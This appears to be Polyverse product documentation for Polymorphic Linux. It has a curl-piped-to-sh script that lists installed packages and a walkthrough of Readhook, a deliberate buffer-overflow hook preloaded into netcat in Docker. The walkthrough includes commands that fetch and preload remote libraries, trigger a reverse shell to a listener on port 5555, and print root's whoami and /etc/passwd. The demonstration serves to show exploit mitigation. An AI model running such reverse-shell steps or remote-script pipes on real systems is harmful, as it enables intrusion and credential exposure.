This script lists which repository every installed package was downloaded from. You can use this to verify which packages were replaced by Polymorphic versions.
Note: this script uses the strings utility, which can be found in the binutils package.
curl https://sh.polyverse.com | sh -s list-installed-elf
A video can be found on this analysis tool here.
Readhook is an intentional (and very helpful) buffer-overflow tool, which Red-Teams and individuals can use to get past the difficult and time-consuming business of crafting an exploit. It allows for a full demonstration of the capabilities of Polymorphic Linux, such that a malicious payload, that works across homogeneous systems, will fail when it targets a Polymorphic Linux system.
We can observe Readhook in action by hooking a standard Linux utility (nc) and then have it “phone home” to a listener on port 5555 via a buffer-overflow exploit. We will rely on Docker to host nc (netcat or ncat on some systems) with Readhook, and a host machine will be listening for the call (also using nc, so try to keep them straight as you step through this). The plain text in the blocks are commands that you can cut and paste into your shells. The bold text are examples of what you can expect to see back from the preceding command.
Shell 1: Start a listener for the exploit to call back to. You’ll need the IP address of this listener so you can generate a payload that knows where to call back to. (Since the host is using Docker for Mac, the Docker DNS entry “docker.for.mac.localhost” can be used, which resolves to the host’s Docker IP address.)
nc -l 5555
Shell 2: Open a new shell to start the echo server with readhook. The following commands retrieve the readhook components and runs (a second) nc configured as an “echo server” with readhook active.
docker run --rm --name echo -d -p 8080:8080 alpine:3.7 sh -c 'wget -q -O /tmp/basehook.so https://github.com/plexsolutions/readhook/releases/download/v1.2.2/basehook.so && wget -q -O /tmp/fullhook.so https://github.com/plexsolutions/readhook/releases/download/v1.2.2/fullhook.so && LD_PRELOAD="/tmp/fullhook.so /tmp/basehook.so" nc -l -p 8080 -e /bin/cat'
Shell 2: In the same shell, run (a third) nc to connect to the echo server that you just launched. (It’s running in the background.)
nc localhost 8080 echo-this-back-to-me echo-this-back-to-me
Shell 2: Also in the same shell, try the same thing with the magic string “xyzzx”, the verb “MAKELOAD”, and the IP address (or DNS name) of the listener (listening in shell 1; in my case, I can use the special Docker DNS name “docker.for.mac.localhost”).
Aha! That’s not an echo, it’s the string that will cause nc to phone home to the listener. Let’s test it out.
Shell 2: Copy the result from above (the red text) and send it back to the echo server. It contains a magic string and a different verb, “OVERFLOW”.
Hmm… That’s not an echo either. (It turns out the echo server has given way to our exploit: there is now a reverse shell where our echo server used to be.) Let’s go back to our original listener running in Shell 1 to see what we can do.
Shell 1: Go back to the first shell that is listening to port 5555.
whoami root cat /etc/passwd root:x:0:0:root:/root:/bin/ash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/usr/lib/news:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin operator:x:11:0:operator:/root:/bin/sh man:x:13:15:man:/usr/man:/sbin/nologin postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin cron:x:16:16:cron:/var/spool/cron:/sbin/nologin ftp:x:21:21::/var/lib/ftp:/sbin/nologin sshd:x:22:22:sshd:/dev/null:/sbin/nologin at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin games:x:35:35:games:/usr/games:/sbin/nologin postgres:x:70:70::/var/lib/postgresql:/bin/sh cyrus:x:85:12::/usr/cyrus:/sbin/nologin vpopmail:x:89:89::/var/vpopmail:/sbin/nologin ntp:x:123:123:NTP:/var/empty:/sbin/nologin smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin guest:x:405:100:guest:/dev/null:/sbin/nologin nobody:x:65534:65534:nobody:/:/sbin/nologin
That’s it! You can do the same thing with any application that links to libc (which is just about everything).